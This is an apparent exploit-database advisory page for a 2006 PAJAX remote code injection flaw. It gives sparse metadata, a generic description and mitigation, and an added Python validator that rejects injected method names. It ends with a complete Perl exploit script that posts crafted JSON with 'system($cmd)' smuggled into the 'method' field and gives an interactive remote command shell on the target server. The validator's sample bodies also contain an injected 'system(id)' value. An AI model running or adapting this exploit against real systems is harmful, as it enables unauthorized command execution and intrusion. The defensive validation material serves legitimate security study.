Vendor: N/A
By: Stoney
CVSS: 9.3 (HIGH)
Remote Code Injection
CWE: 78
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PAJAX Remote Code Injection

PAJAX Remote Code Injection is a vulnerability that allows an attacker to inject malicious code into a vulnerable web application. The vulnerability is caused by improper input validation of user-supplied data. The attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable web application. The malicious code is then executed on the server, allowing the attacker to gain access to sensitive information or execute arbitrary code.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in the application. Additionally, the application should be configured to use the latest security patches and updates.
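An added example (not part of the original advisory and not PAJAX code) of the input validation recommended above, applied to the JSON call format visible in the request below: `className` and `method` must be plain identifiers and appear on an allowlist before any dispatch happens. The allowlist contents, the `validate_call` helper and the sample bodies are assumptions made for illustration.

```python
import json
import re

# Assumption: a legitimate class or method name is a plain identifier and nothing more.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Hypothetical allowlist of remotely callable classes and their methods.
ALLOWED_CALLS = {"Calculator": {"add", "multiply"}}


def validate_call(body: str):
    """Return (ok, reason) for one JSON call body; never evaluates any field."""
    try:
        call = json.loads(body)
    except ValueError:
        return False, "body is not valid JSON"
    if not isinstance(call, dict):
        return False, "body is not a JSON object"
    # Reject anything that is not a bare identifier (parentheses, ';', '$', '->', spaces).
    for field in ("className", "method"):
        value = call.get(field)
        if not isinstance(value, str) or not IDENT.fullmatch(value):
            return False, f"{field} is not a plain identifier"
    # Well-formed names must still be explicitly exported.
    methods = ALLOWED_CALLS.get(call["className"])
    if methods is None or call["method"] not in methods:
        return False, "class/method not on the allowlist"
    params = call.get("params", [])
    if not isinstance(params, list) or not all(
        isinstance(p, (str, int, float)) and not isinstance(p, bool) for p in params
    ):
        return False, "params must be a list of scalars"
    return True, "ok"


# Constructed sample bodies modelled on the request shape shown on this page.
SAMPLES = [
    '{"id": "x1", "className": "Calculator", "method": "add", "params": ["1", "5"]}',
    '{"id": "x2", "className": "Calculator", "method": "add(1,1);system(id);$obj->add", "params": ["1", "5"]}',
    '{"id": "x3", "className": "Calculator", "method": "reset", "params": []}',
    '{"id": "x4", "className": "Calculator", "method": ["add"], "params": []}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(validate_call(body), body[:70])
```

The same check can run over logged request bodies to flag past calls whose `method` value was not a plain identifier.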

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print "PAJAX Remote Code Injection - code by: Stoney - exploit found by: RedTeam\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $path = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
 while (1) {
   print '['.$host.']# ';
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}";

   print $sock "POST ".$path." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
   print $sock "Content-Type: text/json\n";
   print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
   while ($ans = <$sock>)
      {
       print "$ans";
      }
  }
 }
else {
 print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
exit;
}

# milw0rm.com [2006-04-13]